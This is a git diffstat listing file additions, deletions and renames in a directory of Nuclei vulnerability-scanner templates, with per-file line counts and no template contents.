- .../Other/secgate-3600-file-upload.yaml | 21 +- .../Other/secmail-detect-10111.yaml | 25 + nuclei-templates/Other/secmail-detect.yaml | 24 - ...aml => secnet-ac-default-login-10113.yaml} | 0 nuclei-templates/Other/secnet-ac-panel.yaml | 8 +- nuclei-templates/Other/secret-token-rb.yaml | 6 +- nuclei-templates/Other/secrets-file.yaml | 8 +- .../Other/secsslvpn-auth-bypass.yaml | 11 +- nuclei-templates/Other/secui-waf-detect.yaml | 11 +- nuclei-templates/Other/secure-downloads.yaml | 59 + .../Other/securenvoy-panel-10116.yaml | 23 - nuclei-templates/Other/securenvoy-panel.yaml | 19 + .../Other/security-onion-panel.yaml | 10 +- nuclei-templates/Other/security.txt.yaml | 4 + .../Other/securityspy-detect-10119.yaml | 25 + 
.../Other/securityspy-detect-10121.yaml | 24 - .../Other/seeddms-default-login-10128.yaml | 40 + .../Other/seeddms-default-login.yaml | 35 - .../Other/seeddms-detect-10131.yaml | 21 - nuclei-templates/Other/seeddms-detect.yaml | 21 + nuclei-templates/Other/seeddms-panel.yaml | 18 +- nuclei-templates/Other/seeddms.yaml | 20 + .../Other/seeyon-a8-default-login.yaml | 4 +- .../Other/seeyon-monitor-default-login.yaml | 8 +- .../Other/seeyon-oa-fastjson-rce.yaml | 4 +- nuclei-templates/Other/seeyon-oa-log4j.yaml | 6 +- nuclei-templates/Other/seeyon-unauth.yaml | 8 +- nuclei-templates/Other/seeyon_fastjson.yaml | 8 +- nuclei-templates/Other/seeyon_log4j.yaml | 11 +- .../Other/segment-public-api.yaml | 5 +- .../Other/selea-ip-camera-10136.yaml | 30 + nuclei-templates/Other/selea-ip-camera.yaml | 29 - .../Other/selenium-exposure-10137.yaml | 36 - .../Other/selenium-exposure-10138.yaml | 32 + nuclei-templates/Other/selenium-grid.yaml | 7 +- nuclei-templates/Other/self-signed-ssl.yaml | 11 +- nuclei-templates/Other/self_service.yaml | 20 + nuclei-templates/Other/selfcheck-panel.yaml | 5 +- .../senayan_library_management_system.yaml | 20 + ...id-api(1).yaml => sendgrid-api-11859.yaml} | 0 nuclei-templates/Other/sendgrid-env.yaml | 5 +- .../{nuxt_fs.yaml => sensei-message-wp.yaml} | 0 .../sensitive-storage-data-exposure-1.yaml | 29 + .../sensitive-storage-data-exposure-2.yaml | 29 + .../sensitive-storage-data-exposure-3.yaml | 29 + .../sensitive-storage-data-exposure-4.yaml | 29 + .../sensitive-storage-data-exposure-5.yaml | 29 + .../sensitive-storage-data-exposure-6.yaml | 29 + ...3.yaml => sensitive-storage-exposure.yaml} | 0 nuclei-templates/Other/sensu-panel.yaml | 6 +- .../Other/sentinelone-console.yaml | 9 +- nuclei-templates/Other/sentry-panel.yaml | 10 +- nuclei-templates/Other/seo-by-rank-math.yaml | 4 +- .../Other/seo-redirection-xss.yaml | 16 +- .../Other/seowon-router-rce-10147.yaml | 27 + nuclei-templates/Other/seowon-router-rce.yaml | 31 - 
.../Other/sequoiadb-default-login-10150.yaml | 45 + .../Other/sequoiadb-default-login.yaml | 43 - ...in.yaml => server-backup-login-10156.yaml} | 0 ...server-backup-manager-se-login-detect.yaml | 22 - .../Other/server-backup-manager-se.yaml | 33 + .../Other/server-monitor-installer.yaml | 5 +- .../Other/server-status-localhost-10165.yaml | 22 + .../Other/server-status-localhost.yaml | 32 - nuclei-templates/Other/server-status.yaml | 7 +- .../Other/servfail-refused-hosts-10167.yaml | 17 + .../Other/servfail-refused-hosts.yaml | 21 - .../Other/service-account-credentials.yaml | 6 +- nuclei-templates/Other/service-pwd.yaml | 10 +- ...aml => servicedesk-login-panel-10173.yaml} | 0 ...servicenow-helpdesk-credential-10175.yaml} | 0 nuclei-templates/Other/servicenow-panel.yaml | 8 +- nuclei-templates/Other/servudaemon-ini.yaml | 42 +- .../Other/set-and-secure-passwords.yaml | 15 +- nuclei-templates/Other/set-hostname.yaml | 7 +- .../Other/setPreferences-xss.yaml | 29 - .../Other/setup-github-enterprise.yaml | 7 +- .../Other/setup-page-exposure.yaml | 3 - .../Other/sevone-nms-network-manager.yaml | 7 +- .../Other/sftp-config-exposure.yaml | 12 +- .../Other/sftp-deployment-config.yaml | 13 +- nuclei-templates/Other/sg-cachepress.yaml | 4 +- nuclei-templates/Other/sg-security.yaml | 4 +- ...-panel.yaml => sgp-login-panel-10185.yaml} | 0 nuclei-templates/Other/shad0w-c2-jarm.yaml | 5 +- nuclei-templates/Other/shadowpad-c2.yaml | 5 +- .../Other/shardingsphere-panel.yaml | 9 +- .../Other/sharecenter-login-10189.yaml | 16 + .../Other/sharecenter-login-10190.yaml | 19 - nuclei-templates/Other/sharefile-panel.yaml | 10 +- nuclei-templates/Other/shell-box.yaml | 10 +- .../Other/shell-history-10191.yaml | 46 + nuclei-templates/Other/shell-history.yaml | 39 - nuclei-templates/Other/shell_scripts.yaml | 8 +- ...pped100-sqli.yaml => shipped100-sqli.yaml} | 0 .../shiro-deserialization-detection.yaml | 19 +- .../Other/shopify-app-installer.yaml | 6 +- .../Other/shopify-custom-token.yaml 
| 13 - ...199.yaml => shopify-private-token(1).yaml} | 0 .../Other/shopify-public-access.yaml | 5 +- .../Other/shopify-shared-secret(1).yaml | 13 + .../Other/shopify-shared-secret.yaml | 16 - ...10202.yaml => shopify-takeover-10203.yaml} | 0 ...-token.yaml => shoppable-token-10209.yaml} | 0 .../Other/shopware-detect-10213.yaml | 27 + nuclei-templates/Other/shopware-detect.yaml | 32 - nuclei-templates/Other/shopxo.yaml | 22 + nuclei-templates/Other/short-io-takeover.yaml | 30 + nuclei-templates/Other/short-io.yaml | 19 - .../Other/shortcode-lfi-10214.yaml | 26 + nuclei-templates/Other/shortcode-lfi.yaml | 37 - .../Other/shortcodes-ultimate.yaml | 6 +- .../Other/shortpixel-image-optimiser.yaml | 2 +- .../Other/shortpixel-image-optimizer-xss.yaml | 15 +- .../Other/shoutcast-server-10217.yaml | 25 - nuclei-templates/Other/shoutcast-server.yaml | 21 + .../Other/showdoc-default-login-10221.yaml | 38 - .../Other/showdoc-default-login.yaml | 40 + .../Other/showdoc-default-password.yaml | 5 - ...aml => showdoc-file-upload-rce-10226.yaml} | 0 .../Other/sick-beard-xss-10233.yaml | 30 + nuclei-templates/Other/sick-beard-xss.yaml | 28 - nuclei-templates/Other/sicom-panel.yaml | 9 +- .../Other/sidekiq-dashboard-10236.yaml | 19 + nuclei-templates/Other/sidekiq-dashboard.yaml | 26 - nuclei-templates/Other/sigma_wide.yaml | 20 + nuclei-templates/Other/signatures-10259.yaml | 39778 ++++++++ .../{liferay.yaml => signatures-10266.yaml} | 0 nuclei-templates/Other/signatures.yaml | 75690 ++++++++++++---- .../Other/signet-explorer-dashboard.yaml | 6 +- .../Other/silenttrinity-c2-jarm.yaml | 5 +- .../Other/simple-crm-sql-injection-10278.yaml | 30 + .../Other/simple-crm-sql-injection.yaml | 34 - .../Other/simple-custom-post-order.yaml | 2 +- .../Other/simple-employee-rce-10279.yaml | 53 + .../Other/simple-employee-rce.yaml | 41 - .../Other/simple-image-manipulator-lfi.yaml | 13 +- .../Other/simple-page-ordering.yaml | 6 +- .../Other/simplebooklet-takeover.yaml | 5 +- 
.../Other/site-map-sql-injection.yaml | 40 + .../Other/sitecore-debug-page.yaml | 4 - ...n-10287.yaml => sitecore-login-10289.yaml} | 0 .../Other/sitecore-version-10291.yaml | 26 + nuclei-templates/Other/sitecore-version.yaml | 30 - .../Other/{SiteCore.yaml => sitecore.yaml} | 0 nuclei-templates/Other/siteguard.yaml | 2 +- .../Other/sitemap-sql-injection.yaml | 21 - nuclei-templates/Other/sitemap.yaml | 75 +- .../Other/siteminder-dom-xss.yaml | 7 +- nuclei-templates/Other/siteorigin-panels.yaml | 2 +- nuclei-templates/Other/skeepers-panel.yaml | 6 +- ...4.yaml => skycaiji-admin-panel-10306.yaml} | 0 .../Other/skycaiji-install-10309.yaml | 25 + nuclei-templates/Other/skycaiji-install.yaml | 26 - nuclei-templates/Other/sl-studio-lfi.yaml | 4 - .../Other/slack-access-token.yaml | 8 - .../Other/slack-bot-token-10310.yaml | 18 + .../Other/slack-bot-token-10313.yaml | 18 - nuclei-templates/Other/slims-xss.yaml | 7 +- nuclei-templates/Other/sliver-c2-jarm.yaml | 5 +- ...cum-login.yaml => slocum-login-10317.yaml} | 0 .../Other/slurm-hpc-dashboard.yaml | 15 +- nuclei-templates/Other/smart-slider-3.yaml | 2 +- .../Other/smartbi-default-login.yaml | 13 +- .../Other/smarterstats-setup.yaml | 6 +- .../Other/smartjob-takeover-10324.yaml | 5 +- .../Other/smartling-takeover-10327.yaml | 15 + .../Other/smartling-takeover.yaml | 15 - .../Other/smartping-dashboard.yaml | 10 +- .../Other/smartsense-default-login-10331.yaml | 39 + .../Other/smartsense-default-login.yaml | 38 - .../Other/smartstore-detect-10332.yaml | 8 +- nuclei-templates/Other/smb-detect.yaml | 9 +- nuclei-templates/Other/smb-enum.yaml | 36 +- nuclei-templates/Other/smf-installer.yaml | 5 +- nuclei-templates/Other/sms-installer.yaml | 5 +- nuclei-templates/Other/smtp-detect.yaml | 10 +- nuclei-templates/Other/smtp2go-detect.yaml | 9 +- .../Other/smugmug-takeover-10340.yaml | 16 + nuclei-templates/Other/smugmug-takeover.yaml | 18 - nuclei-templates/Other/snapcomms-panel.yaml | 5 +- 
nuclei-templates/Other/snapdrop-detect.yaml | 7 +- nuclei-templates/Other/snipeit-panel.yaml | 14 +- ...plets-lfi.yaml => sniplets-lfi-10343.yaml} | 0 ...plets-xss.yaml => sniplets-xss-10344.yaml} | 0 .../snyk-ignore-file-disclosure-10347.yaml | 24 + .../Other/snyk-ignore-file-disclosure.yaml | 21 - nuclei-templates/Other/so-widgets-bundle.yaml | 4 +- .../sofneta-mecdream-pacs-lfi-10351.yaml | 27 + .../Other/sofneta-mecdream-pacs-lfi.yaml | 24 - .../sofneta-mecdream-pacs-server-lfi.yaml | 2 +- .../Other/softether-vpn-panel.yaml | 4 +- nuclei-templates/Other/sogo-detect.yaml | 6 +- .../Other/solar-log-authbypass.yaml | 5 - .../Other/solarview-compact-panel.yaml | 15 +- .../Other/solarview-compact-xss.yaml | 5 +- .../Other/solarwinds-arm-panel.yaml | 10 +- .../Other/solarwinds-default-admin-1.yaml | 38 + .../Other/solarwinds-default-login-10354.yaml | 47 + .../Other/solarwinds-default-login.yaml | 37 - .../Other/solarwinds-orion-10357.yaml | 18 - .../Other/solarwinds-orion-10359.yaml | 17 + ... 
=> solarwinds-servuftp-detect-10360.yaml} | 0 nuclei-templates/Other/solr-exposure.yaml | 6 +- ...{solr-fileRead.yaml => solr-fileread.yaml} | 0 .../Other/solr-panel-exposure.yaml | 15 +- .../Other/solr-query-dashboard-10369.yaml | 6 +- nuclei-templates/Other/solr-rce.yaml | 2 - .../Other/somansa-dlp-detect.yaml | 10 +- ...ogin-10371.yaml => somfy-login-10373.yaml} | 0 nuclei-templates/Other/sonarqube-login.yaml | 5 +- .../Other/sonarqube-public-projects.yaml | 10 +- .../Other/sonarqube-token-10382.yaml | 15 + nuclei-templates/Other/sonarqube-token.yaml | 15 - .../Other/sonic-wall-application.yaml | 12 +- nuclei-templates/Other/sonic-wall-login.yaml | 8 +- .../Other/sonicwall-analyzer-login.yaml | 12 +- .../sonicwall-management-panel-10387.yaml | 17 - .../Other/sonicwall-management-panel.yaml | 15 + ...yaml => sonicwall-sslvpn-panel-10388.yaml} | 0 .../sonicwall-sslvpn-shellshock-10393.yaml | 26 + .../Other/sonicwall-sslvpn-shellshock.yaml | 29 - .../Other/sony-bravia-disclosure.yaml | 6 +- ...ml => sophos-fw-version-detect-10397.yaml} | 0 .../Other/sophos-mobile-panel-detection.yaml | 4 - .../Other/sophos-mobile-panel.yaml | 13 +- .../Other/sophos-web-appliance.yaml | 10 +- .../Other/sound4-directory-listing.yaml | 5 +- .../Other/sound4-file-disclosure.yaml | 7 +- .../Other/spacelogic-cbus-panel.yaml | 10 +- nuclei-templates/Other/spark-panel.yaml | 14 +- .../Other/spark-webui-unauth-10401.yaml | 22 + .../Other/spark-webui-unauth.yaml | 24 - .../Other/spectracom-default-login-10405.yaml | 41 + .../Other/spectracom-default-login.yaml | 36 - nuclei-templates/Other/speedtest-panel.yaml | 5 +- ...er-login.yaml => sphider-login-10408.yaml} | 0 .../Other/sphinxonline-panel.yaml | 5 +- ...spidercontrol-scada-server-info-10411.yaml | 31 + .../spidercontrol-scada-server-info.yaml | 30 - nuclei-templates/Other/spiderfoot.yaml | 8 +- .../Other/splash-render-ssrf.yaml | 4 +- .../Other/splunk-enterprise-login-panel.yaml | 35 - .../Other/splunk-enterprise-panel-10415.yaml | 46 
+ ...unk-login.yaml => splunk-login-10419.yaml} | 0 nuclei-templates/Other/spnego-detect.yaml | 5 +- nuclei-templates/Other/spon-ip-rce.yaml | 7 +- .../Other/sponip-network-system-ping-rce.yaml | 16 +- .../spoofable-spf-records-ptr-10426.yaml | 9 +- nuclei-templates/Other/spotify.yaml | 34 + .../Other/spotweb-login-panel.yaml | 10 +- nuclei-templates/Other/spring-detect.yaml | 9 +- nuclei-templates/Other/spring-eureka.yaml | 5 +- .../Other/spring-framework-exceptions.yaml | 3 - ...figuration.yaml => spring_collection.yaml} | 0 ...34.yaml => springboot-actuator-10433.yaml} | 0 ...pringboot-actuators-jolokia-xxe-10432.yaml | 31 + .../springboot-actuators-jolokia-xxe.yaml | 28 - .../Other/springboot-auditevents.yaml | 8 +- nuclei-templates/Other/springboot-beans.yaml | 4 - nuclei-templates/Other/springboot-caches.yaml | 6 +- .../Other/springboot-conditions.yaml | 6 +- nuclei-templates/Other/springboot-dump.yaml | 4 - .../Other/springboot-env-10450.yaml | 44 + nuclei-templates/Other/springboot-env.yaml | 41 - .../Other/springboot-exposures.yaml | 2 +- .../Other/springboot-features.yaml | 6 +- nuclei-templates/Other/springboot-flyway.yaml | 6 +- .../Other/springboot-gateway-10453.yaml | 29 + .../Other/springboot-gateway.yaml | 34 - .../Other/springboot-h2-db-rce.yaml | 8 +- .../Other/springboot-health-10459.yaml | 24 + nuclei-templates/Other/springboot-health.yaml | 25 - .../Other/springboot-heapdump-10465.yaml | 25 + .../Other/springboot-httptrace-10467.yaml | 32 + .../Other/springboot-httptrace.yaml | 33 - .../Other/springboot-info-10470.yaml | 36 - .../Other/springboot-info-10471.yaml | 32 + .../Other/springboot-jolokia.yaml | 8 +- .../Other/springboot-liquidbase.yaml | 6 +- .../Other/springboot-log4j-rce-10474.yaml | 62 + .../Other/springboot-log4j-rce.yaml | 47 - .../Other/springboot-logfile.yaml | 6 +- .../Other/springboot-loggerconfig.yaml | 8 +- .../Other/springboot-loggers.yaml | 9 +- .../Other/springboot-metrics-10482.yaml | 32 + 
.../Other/springboot-scheduledtasks.yaml | 8 +- nuclei-templates/Other/springboot-status.yaml | 8 +- .../Other/springboot-threaddump-10485.yaml | 37 + .../Other/springboot-threaddump.yaml | 32 - .../Other/springboot-trace-10492.yaml | 36 - nuclei-templates/Other/springboot-trace.yaml | 31 + .../Other/springcloud-function-spel-rce.yaml | 6 +- .../Other/sprintful-takeover-10495.yaml | 24 + .../Other/sprintful-takeover.yaml | 29 - nuclei-templates/Other/sql-dump-10496.yaml | 46 + nuclei-templates/Other/sql-dump.yaml | 42 - nuclei-templates/Other/sql-injection.yaml | 94 +- .../Other/sql-server-reporting-10508.yaml | 13 + .../Other/sql-server-reporting.yaml | 16 - nuclei-templates/Other/sqlbuddy-panel.yaml | 9 +- nuclei-templates/Other/sqli-error-based.yaml | 492 - .../squid-analysis-report-generator.yaml | 9 +- ...s.yaml => squirrelmail-add-xss-10515.yaml} | 0 nuclei-templates/Other/squirrelmail-lfi.yaml | 8 +- .../Other/squirrelmail-login-10519.yaml | 26 - .../Other/squirrelmail-login-10521.yaml | 22 + .../Other/squirrelmail-vkeyboard-xss.yaml | 5 - .../Other/sqwebmail-login-panel.yaml | 11 +- nuclei-templates/Other/ssh-auth-methods.yaml | 16 +- ...ys.yaml => ssh-authorized-keys-10523.yaml} | 0 .../Other/ssh-cbc-mode-ciphers.yaml | 14 +- .../Other/ssh-diffie-hellman-logjam.yaml | 11 +- nuclei-templates/Other/ssh-known-hosts.yaml | 4 - nuclei-templates/Other/ssh-password-auth.yaml | 12 +- .../Other/ssh-server-enumeration.yaml | 12 +- .../Other/ssh-sha1-hmac-algo.yaml | 11 +- .../Other/ssh-weak-algo-supported.yaml | 14 +- nuclei-templates/Other/ssh-weak-mac-algo.yaml | 14 +- .../Other/ssh-weak-public-key.yaml | 15 +- .../Other/ssh-weakkey-exchange-algo.yaml | 14 +- .../Other/sshd-dropbear-detect.yaml | 62 +- .../Other/ssl-insecure-content-fixer.yaml | 6 +- .../Other/ssl-network-extender.yaml | 12 +- .../Other/ssrf-via-oauth-misconfig.yaml | 5 +- nuclei-templates/Other/ssrf-via-proxy.yaml | 3 +- nuclei-templates/Other/ssti.yaml | 25 - 
nuclei-templates/Other/stackhawk-api-key.yaml | 6 +- nuclei-templates/Other/stackoverflow.yaml | 5 +- nuclei-templates/Other/stackposts-sqli.yaml | 7 +- .../Other/stackstorm-default-login-10530.yaml | 41 + .../Other/stackstorm-default-login.yaml | 47 - .../Other/star-network-utility.yaml | 11 +- .../Other/start-element-manager-panel.yaml | 8 +- ... stem-audio-table-private-keys-10534.yaml} | 0 nuclei-templates/Other/stestr-config.yaml | 12 +- .../Other/steve-default-login.yaml | 12 +- nuclei-templates/Other/steve-login-panel.yaml | 12 +- nuclei-templates/Other/steve-xss.yaml | 6 +- nuclei-templates/Other/steve.yaml | 22 + .../stops-core-theme-and-plugin-updates.yaml | 2 +- nuclei-templates/Other/storybook-panel.yaml | 10 +- ...n.yaml => strapi-documentation-10543.yaml} | 0 nuclei-templates/Other/strapi-page.yaml | 6 +- .../Other/{2904374066.yaml => stratum.yaml} | 0 nuclei-templates/Other/streampipes.yaml | 22 + .../Other/strict-transport-security.yaml | 7 +- .../Other/stridercd-detection.yaml | 3 - nuclei-templates/Other/stridercd-panel.yaml | 12 +- .../Other/strikingly-takeover-10551.yaml | 20 + .../Other/strikingly-takeover.yaml | 17 - ...api-key.yaml => stripe-api-key-11869.yaml} | 0 ....yaml => stripe-restricted-key-10555.yaml} | 0 .../Other/stripe-secret-key-10556.yaml | 17 - .../Other/stripe-secret-key-10558.yaml | 15 + nuclei-templates/Other/strong-ciphers.yaml | 5 +- nuclei-templates/Other/structurizr-panel.yaml | 7 +- .../Other/struts-debug-mode-10560.yaml | 5 +- .../Other/struts-ognl-console.yaml | 9 +- .../Other/struts-problem-report-10564.yaml | 20 + .../Other/struts-problem-report.yaml | 19 - .../Other/styleci-yml-disclosure.yaml | 5 +- .../Other/subdomain-takeover-dns-10566.yaml | 52 + .../subdomain-takeover-dns-wildcards.yaml | 48 +- .../Other/subdomain-takeover-dns.yaml | 52 - .../Other/subdomain-takeover.yaml | 387 + .../Other/submitty-login-10568.yaml | 36 + nuclei-templates/Other/submitty-login.yaml | 36 - .../Other/subrion-cms-detect.yaml | 7 
+- nuclei-templates/Other/subrion-login.yaml | 19 +- nuclei-templates/Other/sucuri-firewall.yaml | 7 +- nuclei-templates/Other/sucuri-scanner.yaml | 2 +- nuclei-templates/Other/sugarcrm-panel.yaml | 7 +- .../Other/suitecrm-installer.yaml | 5 +- .../Other/sumowebtools-installer.yaml | 5 +- .../Other/sunbird-dcim-panel.yaml | 5 +- .../Other/sungrow-logger1000-detect.yaml | 9 +- .../Other/superadmin-ui-panel.yaml | 9 +- .../Other/supermicro-bmc-panel.yaml | 9 +- .../Other/supermicro-default-login.yaml | 14 +- .../Other/superset-default-login.yaml | 8 - nuclei-templates/Other/superset-login.yaml | 24 +- nuclei-templates/Other/supershell-c2.yaml | 6 +- .../Other/supershell-default-login.yaml | 31 +- ...n-panel.yaml => supervpn-panel-10575.yaml} | 0 ...akeover.yaml => surge-takeover-10579.yaml} | 0 .../Other/surrealtodo-lfi-10580.yaml | 5 +- .../Other/surveygizmo-takeover-10584.yaml | 7 +- .../Other/surveysparrow-takeover.yaml | 8 +- .../suspicious-sql-error-messages-10585.yaml | 8 +- nuclei-templates/Other/svg-support.yaml | 2 +- nuclei-templates/Other/svn-wc-db.yaml | 12 +- ...config.yaml => svnserve-config-10590.yaml} | 0 .../Other/swag-instance-default-page.yaml | 8 +- nuclei-templates/Other/swagger-api-10593.yaml | 28 + nuclei-templates/Other/swagger-api-11.yaml | 30 + nuclei-templates/Other/swagger-version.yaml | 25 +- nuclei-templates/Other/sxf-filedownload.yaml | 4 +- nuclei-templates/Other/sym404.yaml | 4 - .../Other/symantec-dlp-login-10596.yaml | 24 - .../Other/symantec-dlp-login.yaml | 21 + .../Other/symantec-epm-login-10602.yaml | 20 + .../Other/symantec-epm-login.yaml | 21 - .../Other/symantec-ewep-login-10603.yaml | 24 - .../Other/symantec-ewep-login.yaml | 20 + .../Other/symantec-iam-console.yaml | 11 +- .../Other/symantec-messaging-gateway.yaml | 19 + .../Other/symantec-pgp-global-directory.yaml | 4 - .../Other/symantec-phishing-panel.yaml | 5 +- ...aml => symfony-database-config-10615.yaml} | 0 nuclei-templates/Other/symfony-debug.yaml | 14 +- 
nuclei-templates/Other/symfony-debugmode.yaml | 7 +- .../Other/symfony-fosjrouting-bundle.yaml | 8 +- nuclei-templates/Other/symfony-fragment.yaml | 39 +- .../Other/symfony-profiler-10625.yaml | 17 + nuclei-templates/Other/symfony-profiler.yaml | 19 - .../Other/symfony-properties-ini.yaml | 6 +- nuclei-templates/Other/symfony-security.yaml | 6 +- nuclei-templates/Other/symfonyrce.yaml | 22 + .../Other/synapse-mobility-panel.yaml | 9 +- nuclei-templates/Other/syncserver-panel.yaml | 10 +- .../Other/syncthing-dashboard.yaml | 8 +- .../Other/syncthru-web-service.yaml | 14 +- .../Other/synology-web-station.yaml | 4 - .../Other/synopsys-coverity-panel.yaml | 7 +- .../Other/system-properties-exposure.yaml | 5 +- .../Other/szhe-default-login-10636.yaml | 42 + .../Other/szhe-default-login.yaml | 41 - nuclei-templates/Other/t24.yaml | 20 + .../Other/table-of-contents-plus.yaml | 2 +- .../Other/tableau-panel-10641.yaml | 25 - .../Other/tableau-panel-10642.yaml | 21 + .../Other/tableau-server-detect-10643.yaml | 36 - .../Other/tableau-server-detect.yaml | 31 + .../Other/tableau-service-manager.yaml | 14 +- nuclei-templates/Other/tablepress.yaml | 4 +- .../Other/tabnabbing-check-10646.yaml | 25 + nuclei-templates/Other/tabnabbing-check.yaml | 22 - nuclei-templates/Other/tailon-panel.yaml | 4 +- .../Other/tamronos-rce-10651.yaml | 19 + nuclei-templates/Other/tamronos-rce.yaml | 24 - .../Other/tamronos-user-creation.yaml | 18 +- nuclei-templates/Other/tamronos.yaml | 22 + .../Other/tar-path-overwrite.yaml | 17 +- ...a-lfi.yaml => targa-camera-lfi-10654.yaml} | 0 .../Other/tasmota-config-webui.yaml | 5 +- nuclei-templates/Other/tasmota-install.yaml | 5 +- nuclei-templates/Other/tautulli-panel.yaml | 8 +- nuclei-templates/Other/tautulli-unauth.yaml | 8 +- .../Other/tave-takeover-10660.yaml | 18 + nuclei-templates/Other/tave-takeover.yaml | 15 - .../Other/taxonomy-terms-order.yaml | 2 +- nuclei-templates/Other/tcp.yaml | 25 + .../{tcpconfig.yaml => tcpconfig-10665.yaml} | 0 
.../Other/teamcity-guest-login-enabled.yaml | 7 +- .../Other/teamcity-login-panel.yaml | 23 +- .../Other/teamcity-registration-enabled.yaml | 5 +- nuclei-templates/Other/teampass-panel.yaml | 13 +- nuclei-templates/Other/teamwork-takeover.yaml | 7 +- ...ech-detect.yaml => tech-detect-10673.yaml} | 0 ....yaml => tectuus-scada-monitor-10679.yaml} | 0 .../Other/tekon-info-leak-10684.yaml | 31 + nuclei-templates/Other/tekon-info-leak.yaml | 40 - nuclei-templates/Other/tekton-dashboard.yaml | 9 +- .../Other/telecom-gateway-default-login.yaml | 18 +- nuclei-templates/Other/telegram-token.yaml | 5 +- nuclei-templates/Other/telegram.yaml | 41 +- ...> telerik-dialoghandler-detect-10691.yaml} | 0 .../telerik-fileupload-detect-10693.yaml | 13 + .../telerik-fileupload-detect-10696.yaml | 17 - .../Other/telerik-server-login.yaml | 11 +- .../Other/telerik_report_server.yaml | 20 + nuclei-templates/Other/telnet-detect.yaml | 10 +- nuclei-templates/Other/teltonika-login.yaml | 15 +- nuclei-templates/Other/tembosocial-panel.yaml | 10 +- nuclei-templates/Other/temenos-t24-login.yaml | 9 +- .../tenda-11n-wireless-router-login.yaml | 13 +- nuclei-templates/Other/tenda-web-master.yaml | 9 +- nuclei-templates/Other/teradek-panel.yaml | 5 +- .../Other/teradici-pcoip-10703.yaml | 23 - .../Other/teradici-pcoip-10704.yaml | 19 + .../Other/teradici-pcoip-panel.yaml | 11 +- ...etect.yaml => terraform-detect-10707.yaml} | 0 .../terraform-enterprise-panel-10712.yaml | 27 + .../Other/terraform-enterprise-panel.yaml | 25 - nuclei-templates/Other/testrail-install.yaml | 5 +- nuclei-templates/Other/text-injection.yaml | 2 +- .../Other/the-events-calendar.yaml | 2 +- .../Other/themeisle-companion.yaml | 6 +- .../Other/thinfinity-virtualui-panel.yaml | 4 - nuclei-templates/Other/thinkCMF_include.yaml | 2 - .../thinkcmf-arbitrary-code-execution.yaml | 4 - .../Other/thinkcmf-detection-10719.yaml | 20 + .../Other/thinkcmf-detection.yaml | 23 - .../Other/thinkcmf-lfi-10721.yaml | 26 + 
nuclei-templates/Other/thinkcmf-lfi.yaml | 37 - .../Other/thinkcmf-rce-10728.yaml | 27 - .../Other/thinkcmf-rce-10729.yaml | 23 + ...0730.yaml => thinkcmf-workflow-10731.yaml} | 0 ...ect.yaml => thinkific-redirect-10734.yaml} | 0 .../Other/thinkphp-2-rce-10738.yaml | 22 + .../Other/thinkphp-2-rce-10741.yaml | 27 - .../Other/thinkphp-501-rce-10743.yaml | 28 - nuclei-templates/Other/thinkphp-501-rce.yaml | 24 + .../Other/thinkphp-5022-rce-10744.yaml | 27 + .../Other/thinkphp-5022-rce-10747.yaml | 27 - .../Other/thinkphp-5023-rce-10748.yaml | 32 + nuclei-templates/Other/thinkphp-5023-rce.yaml | 32 - ...kphp-509-information-disclosure-10752.yaml | 26 - ...kphp-509-information-disclosure-10753.yaml | 22 + ...tq-login-10756.yaml => threatq-login.yaml} | 0 nuclei-templates/Other/thruk-detect.yaml | 4 - nuclei-templates/Other/thruk-xss.yaml | 3 +- .../Other/tianqing-info-leak-10765.yaml | 37 + .../Other/tianqing-info-leak.yaml | 33 - .../Other/tictail-takeover-10768.yaml | 17 + nuclei-templates/Other/tictail-takeover.yaml | 18 - nuclei-templates/Other/tidb-unauth.yaml | 12 +- .../Other/tigase-xmpp-server.yaml | 5 +- .../Other/tikiwiki-cms-10775.yaml | 19 + nuclei-templates/Other/tikiwiki-cms.yaml | 23 - nuclei-templates/Other/tikiwiki-json-rpc.yaml | 44 - ...10778.yaml => tikiwiki-reflected-xss.yaml} | 0 nuclei-templates/Other/tikiwiki-xss.yaml | 8 +- ...akeover.yaml => tilda-takeover-10782.yaml} | 0 .../Other/tileserver-gl-10786.yaml | 33 - .../Other/tileserver-gl-10787.yaml | 29 + .../tiny-file-manager-default-login.yaml | 10 +- nuclei-templates/Other/tiny-file-manager.yaml | 21 +- .../Other/tiny-rss-installer.yaml | 5 +- nuclei-templates/Other/tinyfilemanager.yaml | 20 + nuclei-templates/Other/tinymce-advanced.yaml | 4 +- nuclei-templates/Other/tlr-2005ksh-login.yaml | 12 +- nuclei-templates/Other/tls-sni-proxy.yaml | 9 +- nuclei-templates/Other/token-info-json.yaml | 6 +- nuclei-templates/Other/token-json.yaml | 6 +- .../Other/tomcat-cookie-exposed.yaml | 5 +- 
.../Other/tomcat-default-login-10788.yaml | 18 +- .../Other/tomcat-detect-10794.yaml | 31 + nuclei-templates/Other/tomcat-detect.yaml | 36 - .../Other/tomcat-examples-login.yaml | 44 - .../tomcat-examples-login_CVE-2022-34305.yaml | 49 + .../Other/tomcat-exposed-docs.yaml | 12 +- .../Other/tomcat-manager-default.yaml | 40 +- .../tomcat-manager-pathnormalization-1.yaml | 29 + .../tomcat-manager-pathnormalization-2.yaml | 29 + ... => tomcat-manager-pathnormalization.yaml} | 0 ...scripts.yaml => tomcat-scripts-10802.yaml} | 0 .../Other/tongda-action-uploadfile.yaml | 10 +- .../Other/tongda-path-traversal.yaml | 9 +- .../Other/tongda-session-disclosure.yaml | 6 +- nuclei-templates/Other/tongda_sqli2022.yaml | 4 +- .../Other/tooljet-default-login.yaml | 5 +- nuclei-templates/Other/tooljet-panel.yaml | 10 +- nuclei-templates/Other/tooljet.yaml | 20 + .../Other/top-xss-params-10807.yaml | 81 + nuclei-templates/Other/top-xss-params.yaml | 75 - nuclei-templates/Other/topsec-topacm-rce.yaml | 44 + ...-proxy-10811.yaml => tor-socks-proxy.yaml} | 0 .../Other/tornado-server-login.yaml | 9 +- .../Other/toshiba-topaccess-webserver.yaml | 6 +- nuclei-templates/Other/total-web-10816.yaml | 22 - .../Other/total-web-solutions-panel.yaml | 9 +- nuclei-templates/Other/total-web.yaml | 20 + nuclei-templates/Other/totemomail-detect.yaml | 4 - nuclei-templates/Other/totemomail-panel.yaml | 15 +- nuclei-templates/Other/tox-ini.yaml | 14 +- ... 
